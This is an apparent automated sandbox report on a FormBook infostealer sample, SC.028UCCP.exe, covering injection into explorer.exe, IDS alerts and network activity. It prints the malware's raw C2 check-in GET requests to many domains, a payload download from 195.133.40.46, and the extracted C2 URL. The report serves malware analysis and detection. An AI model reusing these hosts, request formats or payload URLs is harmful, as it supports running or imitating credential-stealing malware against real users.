Source:	Binary string: wntdll.pdb source: SC.028UCCP.exe, SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034C75000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034ACC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034CB0000.00000040.10000000.00040000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2966799157.000000003517A000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mstsc.pdb source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034CB0000.00000040.10000000.00040000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2966799157.000000003517A000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405475
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_00405E9C FindFirstFileA,FindClose,	0_2_00405E9C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_0040264F FindFirstFileA,	0_2_0040264F

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 165.160.15.20 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 206.233.207.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.185.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 183.181.96.18 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.187.111.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.248.157.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.26.48.101 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.17.29.147 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.186.51 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 169.60.232.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.39.114 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49810 -> 195.133.40.46:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 81.17.29.147:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 81.17.29.147:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 81.17.29.147:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 142.250.186.51:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 142.250.186.51:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 142.250.186.51:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49830 -> 198.185.159.144:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49830 -> 198.185.159.144:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49830 -> 198.185.159.144:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49835 -> 165.160.15.20:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49835 -> 165.160.15.20:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49835 -> 165.160.15.20:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 13.248.157.32:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 13.248.157.32:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 13.248.157.32:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49842 -> 104.21.39.114:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49842 -> 104.21.39.114:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49842 -> 104.21.39.114:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49844 -> 169.60.232.139:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49844 -> 169.60.232.139:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49844 -> 169.60.232.139:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.eliteequinewellness.com/ms12/

Source: Joe Sandbox View	ASN Name: CSCUS CSCUS
Source: Joe Sandbox View	ASN Name: SPD-NETTR SPD-NETTR

Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=qQKx9PCKTcR0X3fJLav3D/FI6bogqcX+QhlqDFXKzmg3lH7RMn/qXLrYouNPLK8mW2// HTTP/1.1Host: www.paparazirestaurant.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.eliteequinewellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXb HTTP/1.1Host: www.economjchq.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=rKVQxN6JSordSXvKLLfEBVUre63ztGesQlGfCtix5zz1Yo/EERiTRw3ZQxg6mz/OTP1R&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.friendsofquarepianos.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.arialttnr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=rnwHnBjC2B91WSvUx5IF3sWIhMPrpsyX3rQSnskEXaZlLwDtCWtuXGHAHocTRNCypERK&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.garageautosaintthomas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpy HTTP/1.1Host: www.hospitalityhsia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.abimpianti.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=dB2SKHnvFm/evHV5UtSyv0UoYXCrydohCzjDkTmDf/VJc0uDcAnYtxnT/Jo2TNbLuMGT HTTP/1.1Host: www.drugtestingservices.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=KsItnxjux7GTZO7TUTKtm8QLzBBO9NcCFMwewp8NtohxkT6a6dLohlItrjGlglAawoap HTTP/1.1Host: www.amyjohnsonrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=XQDAKTxCfPAtZ1kZf5EiiDFWaFS1BQmSMuwLBzPPFACL8OgktJOl440I6bHrpdhUiEnu&a6A8=p0GhgVm0MHDdp8m HTTP/1.1Host: www.lists-cellphones.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=G6LllRn2UhCgoj9/NoDttLpXGK4pGwfwFGBz2EgLi6yWMZIZhDysno0vSCCcnKmdw4QQ&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.findyellowfreightjobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=YOOWDLIFFjmzpH1SAG7YZM+LVKYOCEYmA0eV1woM6pvlajKzKUVwFam52RyaFl1jbOMY&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.conscienciaretroprogresiva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=lfzlfRYQFuadehd27GXthwlbqohm3e93HBX/EbDE1KV1AljB6VPD+GnlvvGiXqJ/lo6n&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.triknblog.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&UlWl0=MBZlMJlh34CHQ HTTP/1.1Host: www.abimpianti.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 165.160.15.20 165.160.15.20

Source: global traffic

HTTP traffic detected: GET /CsPlxqjFa224.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.133.40.46Cache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:12:57 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 20 Mar 2023 08:15:35 GMTContent-Type: text/htmlContent-Length: 291ETag: "64063330-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 20 Mar 2023 08:15:56 GMTContent-Type: text/htmlContent-Length: 2843Connection: closeVary: Accept-EncodingLast-Modified: Tue, 20 Apr 2021 00:29:25 GMTETag: "b1b-5c05c89d55ec5"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:16:17 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.40.46

Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7B000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C5B000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://195.133.40.46/
Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://195.133.40.46/CsPlxqjFa224.bin
Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://195.133.40.46/CsPlxqjFa224.bin0
Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://195.133.40.46/CsPlxqjFa224.bin3
Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://195.133.40.46/CsPlxqjFa224.binU
Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://195.133.40.46/CsPlxqjFa224.bin~
Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://195.133.40.46/G
Source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: SC.028UCCP.exe, SC.028UCCP.exe, 00000000.00000000.2396678614.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000006.00000000.2747209758.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SC.028UCCP.exe, 00000000.00000000.2396678614.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SC.028UCCP.exe, 00000006.00000000.2747209758.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000007.00000002.7445959237.0000000002C70000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000626000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: SC.028UCCP.exe, 00000006.00000001.2747874116.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: SC.028UCCP.exe, 00000006.00000001.2747874116.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000003.3115928229.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4196973708.000000000D7B8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/j
Source: explorer.exe, 00000007.00000003.3110344796.0000000010C0C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000000.2898033699.000000000996D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.2906971222.000000000D89D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.coma
Source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
